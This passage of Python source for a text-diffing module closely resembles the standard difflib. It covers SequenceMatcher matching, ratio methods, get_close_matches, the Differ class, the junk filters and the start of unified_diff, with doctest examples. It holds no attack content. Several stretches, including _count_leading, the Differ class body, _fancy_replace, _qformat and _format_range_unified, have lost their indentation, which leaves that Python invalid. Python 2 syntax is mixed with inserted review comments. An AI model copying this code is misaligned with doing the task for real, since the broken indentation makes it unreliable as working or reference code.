        "automatic junk heuristic" that treats popular elements as junk
        (see module documentation for more information).
        """
        # Members:
        # a
        #      first sequence
        # b
        #      second sequence; differences are computed as "what do
        #      we need to do to 'a' to change it into 'b'?"
        # b2j
        #      for x in b, b2j[x] is a list of the indices (into b)
        #      at which x appears; junk elements do not appear
        # fullbcount
        #      for x in b, fullbcount[x] == the number of times x
        #      appears in b; only materialized if really needed (used
        #      only for computing quick_ratio())
        # matching_blocks
        #      a list of (i, j, k) triples, where a[i:i+k] == b[j:j+k];
        #      ascending & non-overlapping in i and in j; terminated by
        #      a dummy (len(a), len(b), 0) sentinel
        # opcodes
        #      a list of (tag, i1, i2, j1, j2) tuples, where tag is
        #      one of
        #          'replace'   a[i1:i2] should be replaced by b[j1:j2]
        #          'delete'    a[i1:i2] should be deleted
        #          'insert'    b[j1:j2] should be inserted
        #          'equal'     a[i1:i2] == b[j1:j2]
        # isjunk
        #      a user-supplied function taking a sequence element and
        #      returning true iff the element is "junk" -- this has
        #      subtle but helpful effects on the algorithm, which I'll
        #      get around to writing up someday <0.9 wink>.
        #      DON'T USE!  Only __chain_b uses this.  Use isbjunk.
        # isbjunk
        #      for x in b, isbjunk(x) == isjunk(x) but much faster;
        #      it's really the __contains__ method of a hidden dict.
        #      DOES NOT WORK for x in a!
        # isbpopular
        #      for x in b, isbpopular(x) is true iff b is reasonably long
        #      (at least 200 elements) and x accounts for more than 1 + 1% of
        #      its elements (when autojunk is enabled).
        #      DOES NOT WORK for x in a!
        self.isjunk = isjunk
        self.a = self.b = None
        self.autojunk = autojunk
        self.set_seqs(a, b)
    def set_seqs(self, a, b):
        """Set the two sequences to be compared.
        >>> s = SequenceMatcher()
        >>> s.set_seqs("abcd", "bcde")
        >>> s.ratio()
        0.75
        """
        self.set_seq1(a)
        self.set_seq2(b)
    def set_seq1(self, a):
        """Set the first sequence to be compared.
        The second sequence to be compared is not changed.
        >>> s = SequenceMatcher(None, "abcd", "bcde")
        >>> s.ratio()
        0.75
        >>> s.set_seq1("bcde")
        >>> s.ratio()
        1.0
        >>>
        SequenceMatcher computes and caches detailed information about the
        second sequence, so if you want to compare one sequence S against
        many sequences, use .set_seq2(S) once and call .set_seq1(x)
        repeatedly for each of the other sequences.
        See also set_seqs() and set_seq2().
        """
        # Identity check: resetting the same object would only invalidate
        # the caches for no benefit.
        if a is self.a:
            return
        self.a = a
        self.matching_blocks = self.opcodes = None
    def set_seq2(self, b):
        """Set the second sequence to be compared.
        The first sequence to be compared is not changed.
        >>> s = SequenceMatcher(None, "abcd", "bcde")
        >>> s.ratio()
        0.75
        >>> s.set_seq2("abcd")
        >>> s.ratio()
        1.0
        >>>
        SequenceMatcher computes and caches detailed information about the
        second sequence, so if you want to compare one sequence S against
        many sequences, use .set_seq2(S) once and call .set_seq1(x)
        repeatedly for each of the other sequences.
        See also set_seqs() and set_seq1().
        """
        if b is self.b:
            return
        self.b = b
        self.matching_blocks = self.opcodes = None
        self.fullbcount = None
        self.__chain_b()
    # For each element x in b, set b2j[x] to a list of the indices in
    # b where x appears; the indices are in increasing order; note that
    # the number of times x appears in b is len(b2j[x]) ...
    # when self.isjunk is defined, junk elements don't show up in this
    # map at all, which stops the central find_longest_match method
    # from starting any matching block at a junk element ...
    # also creates the fast isbjunk function ...
    # b2j also does not contain entries for "popular" elements, meaning
    # elements that account for more than 1 + 1% of the total elements, and
    # when the sequence is reasonably large (>= 200 elements); this can
    # be viewed as an adaptive notion of semi-junk, and yields an enormous
    # speedup when, e.g., comparing program files with hundreds of
    # instances of "return NULL;" ...
    # note that this is only called when b changes; so for cross-product
    # kinds of matches, it's best to call set_seq2 once, then set_seq1
    # repeatedly
    def __chain_b(self):
        # Because isjunk is a user-defined (not C) function, and we test
        # for junk a LOT, it's important to minimize the number of calls.
        # Before the tricks described here, __chain_b was by far the most
        # time-consuming routine in the whole module!  If anyone sees
        # Jim Roskind, thank him again for profile.py -- I never would
        # have guessed that.
        # The first trick is to build b2j ignoring the possibility
        # of junk.  I.e., we don't call isjunk at all yet.  Throwing
        # out the junk later is much cheaper than building b2j "right"
        # from the start.
        b = self.b
        self.b2j = b2j = {}
        for i, elt in enumerate(b):
            indices = b2j.setdefault(elt, [])
            indices.append(i)
        # Purge junk elements
        junk = set()
        isjunk = self.isjunk
        if isjunk:
            for elt in list(b2j.keys()):  # using list() since b2j is modified
                if isjunk(elt):
                    junk.add(elt)
                    del b2j[elt]
        # Purge popular elements that are not junk
        popular = set()
        n = len(b)
        if self.autojunk and n >= 200:
            ntest = n // 100 + 1
            for elt, idxs in list(b2j.items()):
                if len(idxs) > ntest:
                    popular.add(elt)
                    del b2j[elt]
        # Now for x in b, isjunk(x) == x in junk, but the latter is much faster.
        # Since the number of *unique* junk elements is probably small, the
        # memory burden of keeping this set alive is likely trivial compared to
        # the size of b2j.
        self.isbjunk = junk.__contains__
        self.isbpopular = popular.__contains__
    def find_longest_match(self, alo, ahi, blo, bhi):
        """Find longest matching block in a[alo:ahi] and b[blo:bhi].
        If isjunk is not defined:
        Return (i,j,k) such that a[i:i+k] is equal to b[j:j+k], where
            alo <= i <= i+k <= ahi
            blo <= j <= j+k <= bhi
        and for all (i',j',k') meeting those conditions,
            k >= k'
            i <= i'
            and if i == i', j <= j'
        In other words, of all maximal matching blocks, return one that
        starts earliest in a, and of all those maximal matching blocks that
        start earliest in a, return the one that starts earliest in b.
        >>> s = SequenceMatcher(None, " abcd", "abcd abcd")
        >>> s.find_longest_match(0, 5, 0, 9)
        Match(a=0, b=4, size=5)
        If isjunk is defined, first the longest matching block is
        determined as above, but with the additional restriction that no
        junk element appears in the block.  Then that block is extended as
        far as possible by matching (only) junk elements on both sides.  So
        the resulting block never matches on junk except as identical junk
        happens to be adjacent to an "interesting" match.
        Here's the same example as before, but considering blanks to be
        junk.  That prevents " abcd" from matching the " abcd" at the tail
        end of the second sequence directly.  Instead only the "abcd" can
        match, and matches the leftmost "abcd" in the second sequence:
        >>> s = SequenceMatcher(lambda x: x==" ", " abcd", "abcd abcd")
        >>> s.find_longest_match(0, 5, 0, 9)
        Match(a=1, b=0, size=4)
        If no blocks match, return (alo, blo, 0).
        >>> s = SequenceMatcher(None, "ab", "c")
        >>> s.find_longest_match(0, 2, 0, 1)
        Match(a=0, b=0, size=0)
        """
        # CAUTION:  stripping common prefix or suffix would be incorrect.
        # E.g.,
        #    ab
        #    acab
        # Longest matching block is "ab", but if common prefix is
        # stripped, it's "a" (tied with "b").  UNIX(tm) diff does so
        # strip, so ends up claiming that ab is changed to acab by
        # inserting "ca" in the middle.  That's minimal but unintuitive:
        # "it's obvious" that someone inserted "ac" at the front.
        # Windiff ends up at the same place as diff, but by pairing up
        # the unique 'b's and then matching the first two 'a's.
        a, b, b2j, isbjunk = self.a, self.b, self.b2j, self.isbjunk
        besti, bestj, bestsize = alo, blo, 0
        # find longest junk-free match
        # during an iteration of the loop, j2len[j] = length of longest
        # junk-free match ending with a[i-1] and b[j]
        j2len = {}
        nothing = []
        for i in xrange(alo, ahi):
            # look at all instances of a[i] in b; note that because
            # b2j has no junk keys, the loop is skipped if a[i] is junk
            j2lenget = j2len.get
            newj2len = {}
            for j in b2j.get(a[i], nothing):
                # a[i] matches b[j]
                if j < blo:
                    continue
                if j >= bhi:
                    break
                k = newj2len[j] = j2lenget(j-1, 0) + 1
                if k > bestsize:
                    besti, bestj, bestsize = i-k+1, j-k+1, k
            j2len = newj2len
        # Extend the best by non-junk elements on each end.  In particular,
        # "popular" non-junk elements aren't in b2j, which greatly speeds
        # the inner loop above, but also means "the best" match so far
        # doesn't contain any junk *or* popular non-junk elements.
        while besti > alo and bestj > blo and \
              not isbjunk(b[bestj-1]) and \
              a[besti-1] == b[bestj-1]:
            besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
        while besti+bestsize < ahi and bestj+bestsize < bhi and \
              not isbjunk(b[bestj+bestsize]) and \
              a[besti+bestsize] == b[bestj+bestsize]:
            bestsize += 1
        # Now that we have a wholly interesting match (albeit possibly
        # empty!), we may as well suck up the matching junk on each
        # side of it too.  Can't think of a good reason not to, and it
        # saves post-processing the (possibly considerable) expense of
        # figuring out what to do with it.  In the case of an empty
        # interesting match, this is clearly the right thing to do,
        # because no other kind of match is possible in the regions.
        while besti > alo and bestj > blo and \
              isbjunk(b[bestj-1]) and \
              a[besti-1] == b[bestj-1]:
            besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
        while besti+bestsize < ahi and bestj+bestsize < bhi and \
              isbjunk(b[bestj+bestsize]) and \
              a[besti+bestsize] == b[bestj+bestsize]:
            bestsize = bestsize + 1
        return Match(besti, bestj, bestsize)
    def get_matching_blocks(self):
        """Return list of triples describing matching subsequences.
        Each triple is of the form (i, j, n), and means that
        a[i:i+n] == b[j:j+n].  The triples are monotonically increasing in
        i and in j.  New in Python 2.5, it's also guaranteed that if
        (i, j, n) and (i', j', n') are adjacent triples in the list, and
        the second is not the last triple in the list, then i+n != i' or
        j+n != j'.  IOW, adjacent triples never describe adjacent equal
        blocks.
        The last triple is a dummy, (len(a), len(b), 0), and is the only
        triple with n==0.
        >>> s = SequenceMatcher(None, "abxcd", "abcd")
        >>> s.get_matching_blocks()
        [Match(a=0, b=0, size=2), Match(a=3, b=2, size=2), Match(a=5, b=4, size=0)]
        """
        if self.matching_blocks is not None:
            return self.matching_blocks
        la, lb = len(self.a), len(self.b)
        # This is most naturally expressed as a recursive algorithm, but
        # at least one user bumped into extreme use cases that exceeded
        # the recursion limit on their box.  So, now we maintain a list
        # ('queue`) of blocks we still need to look at, and append partial
        # results to `matching_blocks` in a loop; the matches are sorted
        # at the end.
        queue = [(0, la, 0, lb)]
        matching_blocks = []
        while queue:
            alo, ahi, blo, bhi = queue.pop()
            i, j, k = x = self.find_longest_match(alo, ahi, blo, bhi)
            # a[alo:i] vs b[blo:j] unknown
            # a[i:i+k] same as b[j:j+k]
            # a[i+k:ahi] vs b[j+k:bhi] unknown
            if k:   # if k is 0, there was no matching block
                matching_blocks.append(x)
                if alo < i and blo < j:
                    queue.append((alo, i, blo, j))
                if i+k < ahi and j+k < bhi:
                    queue.append((i+k, ahi, j+k, bhi))
        matching_blocks.sort()
        # It's possible that we have adjacent equal blocks in the
        # matching_blocks list now.  Starting with 2.5, this code was added
        # to collapse them.
        i1 = j1 = k1 = 0
        non_adjacent = []
        for i2, j2, k2 in matching_blocks:
            # Is this block adjacent to i1, j1, k1?
            if i1 + k1 == i2 and j1 + k1 == j2:
                # Yes, so collapse them -- this just increases the length of
                # the first block by the length of the second, and the first
                # block so lengthened remains the block to compare against.
                k1 += k2
            else:
                # Not adjacent.  Remember the first block (k1==0 means it's
                # the dummy we started with), and make the second block the
                # new block to compare against.
                if k1:
                    non_adjacent.append((i1, j1, k1))
                i1, j1, k1 = i2, j2, k2
        if k1:
            non_adjacent.append((i1, j1, k1))
        non_adjacent.append( (la, lb, 0) )
        # NOTE(review): under Python 2 map() returns a list here; under
        # Python 3 it would return a lazy iterator and caching it would be
        # a bug (consumed on first use).  This module targets Python 2
        # (see the `raise X, msg` syntax and xrange usage elsewhere).
        self.matching_blocks = map(Match._make, non_adjacent)
        return self.matching_blocks
    def get_opcodes(self):
        """Return list of 5-tuples describing how to turn a into b.
        Each tuple is of the form (tag, i1, i2, j1, j2).  The first tuple
        has i1 == j1 == 0, and remaining tuples have i1 == the i2 from the
        tuple preceding it, and likewise for j1 == the previous j2.
        The tags are strings, with these meanings:
        'replace':  a[i1:i2] should be replaced by b[j1:j2]
        'delete':   a[i1:i2] should be deleted.
                    Note that j1==j2 in this case.
        'insert':   b[j1:j2] should be inserted at a[i1:i1].
                    Note that i1==i2 in this case.
        'equal':    a[i1:i2] == b[j1:j2]
        >>> a = "qabxcd"
        >>> b = "abycdf"
        >>> s = SequenceMatcher(None, a, b)
        >>> for tag, i1, i2, j1, j2 in s.get_opcodes():
        ...    print ("%7s a[%d:%d] (%s) b[%d:%d] (%s)" %
        ...           (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2]))
         delete a[0:1] (q) b[0:0] ()
          equal a[1:3] (ab) b[0:2] (ab)
        replace a[3:4] (x) b[2:3] (y)
          equal a[4:6] (cd) b[3:5] (cd)
         insert a[6:6] () b[5:6] (f)
        """
        if self.opcodes is not None:
            return self.opcodes
        i = j = 0
        self.opcodes = answer = []
        for ai, bj, size in self.get_matching_blocks():
            # invariant:  we've pumped out correct diffs to change
            # a[:i] into b[:j], and the next matching block is
            # a[ai:ai+size] == b[bj:bj+size].  So we need to pump
            # out a diff to change a[i:ai] into b[j:bj], pump out
            # the matching block, and move (i,j) beyond the match
            tag = ''
            if i < ai and j < bj:
                tag = 'replace'
            elif i < ai:
                tag = 'delete'
            elif j < bj:
                tag = 'insert'
            if tag:
                answer.append( (tag, i, ai, j, bj) )
            i, j = ai+size, bj+size
            # the list of matching blocks is terminated by a
            # sentinel with size 0
            if size:
                answer.append( ('equal', ai, i, bj, j) )
        return answer
    def get_grouped_opcodes(self, n=3):
        """ Isolate change clusters by eliminating ranges with no changes.
        Return a generator of groups with up to n lines of context.
        Each group is in the same format as returned by get_opcodes().
        >>> from pprint import pprint
        >>> a = map(str, range(1,40))
        >>> b = a[:]
        >>> b[8:8] = ['i']     # Make an insertion
        >>> b[20] += 'x'       # Make a replacement
        >>> b[23:28] = []      # Make a deletion
        >>> b[30] += 'y'       # Make another replacement
        >>> pprint(list(SequenceMatcher(None,a,b).get_grouped_opcodes()))
        [[('equal', 5, 8, 5, 8), ('insert', 8, 8, 8, 9), ('equal', 8, 11, 9, 12)],
         [('equal', 16, 19, 17, 20),
          ('replace', 19, 20, 20, 21),
          ('equal', 20, 22, 21, 23),
          ('delete', 22, 27, 23, 23),
          ('equal', 27, 30, 23, 26)],
         [('equal', 31, 34, 27, 30),
          ('replace', 34, 35, 30, 31),
          ('equal', 35, 38, 31, 34)]]
        """
        codes = self.get_opcodes()
        if not codes:
            codes = [("equal", 0, 1, 0, 1)]
        # Fixup leading and trailing groups if they show no changes.
        if codes[0][0] == 'equal':
            tag, i1, i2, j1, j2 = codes[0]
            codes[0] = tag, max(i1, i2-n), i2, max(j1, j2-n), j2
        if codes[-1][0] == 'equal':
            tag, i1, i2, j1, j2 = codes[-1]
            codes[-1] = tag, i1, min(i2, i1+n), j1, min(j2, j1+n)
        nn = n + n
        group = []
        for tag, i1, i2, j1, j2 in codes:
            # End the current group and start a new one whenever
            # there is a large range with no changes.
            if tag == 'equal' and i2-i1 > nn:
                group.append((tag, i1, min(i2, i1+n), j1, min(j2, j1+n)))
                yield group
                group = []
                i1, j1 = max(i1, i2-n), max(j1, j2-n)
            group.append((tag, i1, i2, j1 ,j2))
        if group and not (len(group)==1 and group[0][0] == 'equal'):
            yield group
    def ratio(self):
        """Return a measure of the sequences' similarity (float in [0,1]).
        Where T is the total number of elements in both sequences, and
        M is the number of matches, this is 2.0*M / T.
        Note that this is 1 if the sequences are identical, and 0 if
        they have nothing in common.
        .ratio() is expensive to compute if you haven't already computed
        .get_matching_blocks() or .get_opcodes(), in which case you may
        want to try .quick_ratio() or .real_quick_ratio() first to get an
        upper bound.
        >>> s = SequenceMatcher(None, "abcd", "bcde")
        >>> s.ratio()
        0.75
        >>> s.quick_ratio()
        0.75
        >>> s.real_quick_ratio()
        1.0
        """
        matches = reduce(lambda sum, triple: sum + triple[-1],
                         self.get_matching_blocks(), 0)
        return _calculate_ratio(matches, len(self.a) + len(self.b))
    def quick_ratio(self):
        """Return an upper bound on ratio() relatively quickly.
        This isn't defined beyond that it is an upper bound on .ratio(), and
        is faster to compute.
        """
        # viewing a and b as multisets, set matches to the cardinality
        # of their intersection; this counts the number of matches
        # without regard to order, so is clearly an upper bound
        if self.fullbcount is None:
            self.fullbcount = fullbcount = {}
            for elt in self.b:
                fullbcount[elt] = fullbcount.get(elt, 0) + 1
        fullbcount = self.fullbcount
        # avail[x] is the number of times x appears in 'b' less the
        # number of times we've seen it in 'a' so far ... kinda
        avail = {}
        availhas, matches = avail.__contains__, 0
        for elt in self.a:
            if availhas(elt):
                numb = avail[elt]
            else:
                numb = fullbcount.get(elt, 0)
            avail[elt] = numb - 1
            if numb > 0:
                matches = matches + 1
        return _calculate_ratio(matches, len(self.a) + len(self.b))
    def real_quick_ratio(self):
        """Return an upper bound on ratio() very quickly.
        This isn't defined beyond that it is an upper bound on .ratio(), and
        is faster to compute than either .ratio() or .quick_ratio().
        """
        la, lb = len(self.a), len(self.b)
        # can't have more matches than the number of elements in the
        # shorter sequence
        return _calculate_ratio(min(la, lb), la + lb)
def get_close_matches(word, possibilities, n=3, cutoff=0.6):
    """Use SequenceMatcher to return list of the best "good enough" matches.
    word is a sequence for which close matches are desired (typically a
    string); possibilities is a list of sequences against which to match
    word (typically a list of strings).
    Optional arg n (default 3) is the maximum number of close matches to
    return; n must be > 0.  Optional arg cutoff (default 0.6) is a float
    in [0, 1]; possibilities that don't score at least that similar to
    word are ignored.
    The best (no more than n) matches among the possibilities are returned
    in a list, sorted by similarity score, most similar first.
    >>> get_close_matches("appel", ["ape", "apple", "peach", "puppy"])
    ['apple', 'ape']
    >>> import keyword as _keyword
    >>> get_close_matches("wheel", _keyword.kwlist)
    ['while']
    >>> get_close_matches("apple", _keyword.kwlist)
    []
    >>> get_close_matches("accept", _keyword.kwlist)
    ['except']
    """
    if not n > 0:
        raise ValueError("n must be > 0: %r" % (n,))
    if not 0.0 <= cutoff <= 1.0:
        raise ValueError("cutoff must be in [0.0, 1.0]: %r" % (cutoff,))
    scored = []
    matcher = SequenceMatcher()
    matcher.set_seq2(word)
    for candidate in possibilities:
        matcher.set_seq1(candidate)
        # Cheap upper bounds first; the expensive ratio() only runs when
        # the candidate survives both quick screens.
        if (matcher.real_quick_ratio() >= cutoff and
                matcher.quick_ratio() >= cutoff and
                matcher.ratio() >= cutoff):
            scored.append((matcher.ratio(), candidate))
    # Heap-select the n best scorers (most similar first) ...
    scored = heapq.nlargest(n, scored)
    # ... then strip the scores off.
    return [candidate for score, candidate in scored]
def _count_leading(line, ch):
"""
Return number of `ch` characters at the start of `line`.
Example:
>>> _count_leading(' abc', ' ')
3
"""
i, n = 0, len(line)
while i < n and line[i] == ch:
i += 1
return i
class Differ:
r"""
Differ is a class for comparing sequences of lines of text, and
producing human-readable differences or deltas. Differ uses
SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
Each line of a Differ delta begins with a two-letter code:
'- ' line unique to sequence 1
'+ ' line unique to sequence 2
' ' line common to both sequences
'? ' line not present in either input sequence
Lines beginning with '? ' attempt to guide the eye to intraline
differences, and were not present in either input sequence. These lines
can be confusing if the sequences contain tab characters.
Note that Differ makes no claim to produce a *minimal* diff. To the
contrary, minimal diffs are often counter-intuitive, because they synch
up anywhere possible, sometimes accidental matches 100 pages apart.
Restricting synch points to contiguous matches preserves some notion of
locality, at the occasional cost of producing a longer diff.
Example: Comparing two texts.
First we set up the texts, sequences of individual single-line strings
ending with newlines (such sequences can also be obtained from the
`readlines()` method of file-like objects):
>>> text1 = ''' 1. Beautiful is better than ugly.
... 2. Explicit is better than implicit.
... 3. Simple is better than complex.
... 4. Complex is better than complicated.
... '''.splitlines(1)
>>> len(text1)
4
>>> text1[0][-1]
'\n'
>>> text2 = ''' 1. Beautiful is better than ugly.
... 3. Simple is better than complex.
... 4. Complicated is better than complex.
... 5. Flat is better than nested.
... '''.splitlines(1)
Next we instantiate a Differ object:
>>> d = Differ()
Note that when instantiating a Differ object we may pass functions to
filter out line and character 'junk'. See Differ.__init__ for details.
Finally, we compare the two:
>>> result = list(d.compare(text1, text2))
'result' is a list of strings, so let's pretty-print it:
>>> from pprint import pprint as _pprint
>>> _pprint(result)
[' 1. Beautiful is better than ugly.\n',
'- 2. Explicit is better than implicit.\n',
'- 3. Simple is better than complex.\n',
'+ 3. Simple is better than complex.\n',
'? ++\n',
'- 4. Complex is better than complicated.\n',
'? ^ ---- ^\n',
'+ 4. Complicated is better than complex.\n',
'? ++++ ^ ^\n',
'+ 5. Flat is better than nested.\n']
As a single multi-line string it looks like this:
>>> print ''.join(result),
1. Beautiful is better than ugly.
- 2. Explicit is better than implicit.
- 3. Simple is better than complex.
+ 3. Simple is better than complex.
? ++
- 4. Complex is better than complicated.
? ^ ---- ^
+ 4. Complicated is better than complex.
? ++++ ^ ^
+ 5. Flat is better than nested.
Methods:
__init__(linejunk=None, charjunk=None)
Construct a text differencer, with optional filters.
compare(a, b)
Compare two sequences of lines; generate the resulting delta.
"""
def __init__(self, linejunk=None, charjunk=None):
"""
Construct a text differencer, with optional filters.
The two optional keyword parameters are for filter functions:
- `linejunk`: A function that should accept a single string argument,
and return true iff the string is junk. The module-level function
`IS_LINE_JUNK` may be used to filter out lines without visible
characters, except for at most one splat ('#'). It is recommended
to leave linejunk None; as of Python 2.3, the underlying
SequenceMatcher class has grown an adaptive notion of "noise" lines
that's better than any static definition the author has ever been
able to craft.
- `charjunk`: A function that should accept a string of length 1. The
module-level function `IS_CHARACTER_JUNK` may be used to filter out
whitespace characters (a blank or tab; **note**: bad idea to include
newline in this!). Use of IS_CHARACTER_JUNK is recommended.
"""
self.linejunk = linejunk
self.charjunk = charjunk
    def compare(self, a, b):
        r"""
        Compare two sequences of lines; generate the resulting delta.
        Each sequence must contain individual single-line strings ending with
        newlines. Such sequences can be obtained from the `readlines()` method
        of file-like objects. The delta generated also consists of newline-
        terminated strings, ready to be printed as-is via the writeline()
        method of a file-like object.
        Example:
        >>> print ''.join(Differ().compare('one\ntwo\nthree\n'.splitlines(1),
        ...                                'ore\ntree\nemu\n'.splitlines(1))),
        - one
        ?  ^
        + ore
        ?  ^
        - two
        - three
        ?  -
        + tree
        + emu
        """
        # Line-level opcodes decide which rendering helper handles each
        # region of the diff.
        cruncher = SequenceMatcher(self.linejunk, a, b)
        for tag, alo, ahi, blo, bhi in cruncher.get_opcodes():
            if tag == 'replace':
                g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
            elif tag == 'delete':
                g = self._dump('-', a, alo, ahi)
            elif tag == 'insert':
                g = self._dump('+', b, blo, bhi)
            elif tag == 'equal':
                g = self._dump(' ', a, alo, ahi)
            else:
                # NOTE(review): Python 2 `raise X, msg` syntax -- this module
                # targets Python 2 (xrange is also used below).
                raise ValueError, 'unknown tag %r' % (tag,)
            for line in g:
                yield line
def _dump(self, tag, x, lo, hi):
"""Generate comparison results for a same-tagged range."""
for i in xrange(lo, hi):
yield '%s %s' % (tag, x[i])
def _plain_replace(self, a, alo, ahi, b, blo, bhi):
assert alo < ahi and blo < bhi
# dump the shorter block first -- reduces the burden on short-term
# memory if the blocks are of very different sizes
if bhi - blo < ahi - alo:
first = self._dump('+', b, blo, bhi)
second = self._dump('-', a, alo, ahi)
else:
first = self._dump('-', a, alo, ahi)
second = self._dump('+', b, blo, bhi)
for g in first, second:
for line in g:
yield line
def _fancy_replace(self, a, alo, ahi, b, blo, bhi):
r"""
When replacing one block of lines with another, search the blocks
for *similar* lines; the best-matching pair (if any) is used as a
synch point, and intraline difference marking is done on the
similar pair. Lots of work, but often worth it.
Example:
>>> d = Differ()
>>> results = d._fancy_replace(['abcDefghiJkl\n'], 0, 1,
... ['abcdefGhijkl\n'], 0, 1)
>>> print ''.join(results),
- abcDefghiJkl
? ^ ^ ^
+ abcdefGhijkl
? ^ ^ ^
"""
# don't synch up unless the lines have a similarity score of at
# least cutoff; best_ratio tracks the best score seen so far
best_ratio, cutoff = 0.74, 0.75
cruncher = SequenceMatcher(self.charjunk)
eqi, eqj = None, None # 1st indices of equal lines (if any)
# search for the pair that matches best without being identical
# (identical lines must be junk lines, & we don't want to synch up
# on junk -- unless we have to)
for j in xrange(blo, bhi):
bj = b[j]
cruncher.set_seq2(bj)
for i in xrange(alo, ahi):
ai = a[i]
if ai == bj:
if eqi is None:
eqi, eqj = i, j
continue
cruncher.set_seq1(ai)
# computing similarity is expensive, so use the quick
# upper bounds first -- have seen this speed up messy
# compares by a factor of 3.
# note that ratio() is only expensive to compute the first
# time it's called on a sequence pair; the expensive part
# of the computation is cached by cruncher
if cruncher.real_quick_ratio() > best_ratio and \
cruncher.quick_ratio() > best_ratio and \
cruncher.ratio() > best_ratio:
best_ratio, best_i, best_j = cruncher.ratio(), i, j
if best_ratio < cutoff:
# no non-identical "pretty close" pair
if eqi is None:
# no identical pair either -- treat it as a straight replace
for line in self._plain_replace(a, alo, ahi, b, blo, bhi):
yield line
return
# no close pair, but an identical pair -- synch up on that
best_i, best_j, best_ratio = eqi, eqj, 1.0
else:
# there's a close pair, so forget the identical pair (if any)
eqi = None
# a[best_i] very similar to b[best_j]; eqi is None iff they're not
# identical
# pump out diffs from before the synch point
for line in self._fancy_helper(a, alo, best_i, b, blo, best_j):
yield line
# do intraline marking on the synch pair
aelt, belt = a[best_i], b[best_j]
if eqi is None:
# pump out a '-', '?', '+', '?' quad for the synched lines
atags = btags = ""
cruncher.set_seqs(aelt, belt)
for tag, ai1, ai2, bj1, bj2 in cruncher.get_opcodes():
la, lb = ai2 - ai1, bj2 - bj1
if tag == 'replace':
atags += '^' * la
btags += '^' * lb
elif tag == 'delete':
atags += '-' * la
elif tag == 'insert':
btags += '+' * lb
elif tag == 'equal':
atags += ' ' * la
btags += ' ' * lb
else:
raise ValueError, 'unknown tag %r' % (tag,)
for line in self._qformat(aelt, belt, atags, btags):
yield line
else:
# the synch pair is identical
yield ' ' + aelt
# pump out diffs from after the synch point
for line in self._fancy_helper(a, best_i+1, ahi, b, best_j+1, bhi):
yield line
def _fancy_helper(self, a, alo, ahi, b, blo, bhi):
g = []
if alo < ahi:
if blo < bhi:
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
else:
g = self._dump('-', a, alo, ahi)
elif blo < bhi:
g = self._dump('+', b, blo, bhi)
for line in g:
yield line
def _qformat(self, aline, bline, atags, btags):
r"""
Format "?" output and deal with leading tabs.
Example:
>>> d = Differ()
>>> results = d._qformat('\tabcDefghiJkl\n', '\tabcdefGhijkl\n',
... ' ^ ^ ^ ', ' ^ ^ ^ ')
>>> for line in results: print repr(line)
...
'- \tabcDefghiJkl\n'
'? \t ^ ^ ^\n'
'+ \tabcdefGhijkl\n'
'? \t ^ ^ ^\n'
"""
# Can hurt, but will probably help most of the time.
common = min(_count_leading(aline, "\t"),
_count_leading(bline, "\t"))
common = min(common, _count_leading(atags[:common], " "))
common = min(common, _count_leading(btags[:common], " "))
atags = atags[common:].rstrip()
btags = btags[common:].rstrip()
yield "- " + aline
if atags:
yield "? %s%s\n" % ("\t" * common, atags)
yield "+ " + bline
if btags:
yield "? %s%s\n" % ("\t" * common, btags)
# With respect to junk, an earlier version of ndiff simply refused to
# *start* a match with a junk element. The result was cases like this:
# before: private Thread currentThread;
# after: private volatile Thread currentThread;
# If you consider whitespace to be junk, the longest contiguous match
# not starting with junk is "e Thread currentThread". So ndiff reported
# that "e volatil" was inserted between the 't' and the 'e' in "private".
# While an accurate view, to people that's absurd. The current version
# looks for matching blocks that are entirely junk-free, then extends the
# longest one of those as far as possible but only with matching junk.
# So now "currentThread" is matched, then extended to suck up the
# preceding blank; then "private" is matched, and extended to suck up the
# following blank; then "Thread" is matched; and finally ndiff reports
# that "volatile " was inserted before "Thread". The only quibble
# remaining is that perhaps it was really the case that " volatile"
# was inserted after "private". I can live with that <wink>.
import re
def IS_LINE_JUNK(line, pat=re.compile(r"\s*#?\s*$").match):
    r"""
    Return 1 for ignorable line: iff `line` is blank or contains a single '#'.

    Examples:
    >>> IS_LINE_JUNK('\n')
    True
    >>> IS_LINE_JUNK('  #   \n')
    True
    >>> IS_LINE_JUNK('hello\n')
    False
    """
    # the default pattern is bound once at definition time, so the regex
    # is compiled only once
    match = pat(line)
    return match is not None
def IS_CHARACTER_JUNK(ch, ws=" \t"):
    r"""
    Return 1 for ignorable character: iff `ch` is a space or tab.

    Examples:
    >>> IS_CHARACTER_JUNK(' ')
    True
    >>> IS_CHARACTER_JUNK('\t')
    True
    >>> IS_CHARACTER_JUNK('\n')
    False
    >>> IS_CHARACTER_JUNK('x')
    False
    """
    # str.find has the same substring semantics as the `in` operator
    return ws.find(ch) != -1
########################################################################
### Unified Diff
########################################################################
def _format_range_unified(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if length == 1:
return '{}'.format(beginning)
if not length:
beginning -= 1 # empty ranges begin at line just before the range
return '{},{}'.format(beginning, length)
def unified_diff(a, b, fromfile='', tofile='', fromfiledate='',
                 tofiledate='', n=3, lineterm='\n'):
    r"""
    Compare two sequences of lines; generate the delta as a unified diff.

    Unified diffs show changed lines plus `n` lines of surrounding context
    (default 3).  The control lines (those with ---, +++, or @@) carry a
    trailing `lineterm`, so inputs produced by file.readlines() yield diffs
    suitable for file.writelines(); pass lineterm='' for inputs without
    trailing newlines to get a uniformly newline-free result.

    The header may carry filenames and modification times supplied via
    'fromfile', 'tofile', 'fromfiledate' and 'tofiledate' (conventionally in
    ISO 8601 format); unspecified fields default to blanks.

    Example:
    >>> for line in unified_diff('one two three four'.split(),
    ...             'zero one tree four'.split(), 'Original', 'Current',
    ...             '2005-01-26 23:30:50', '2010-04-02 10:20:52',
    ...             lineterm=''):
    ...     print line                 # doctest: +NORMALIZE_WHITESPACE
    --- Original        2005-01-26 23:30:50
    +++ Current         2010-04-02 10:20:52
    @@ -1,4 +1,4 @@
    +zero
     one
    -two
    -three
    +tree
     four
    """
    header_emitted = False
    for group in SequenceMatcher(None, a, b).get_grouped_opcodes(n):
        if not header_emitted:
            # the file header is written once, before the first hunk
            header_emitted = True
            fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
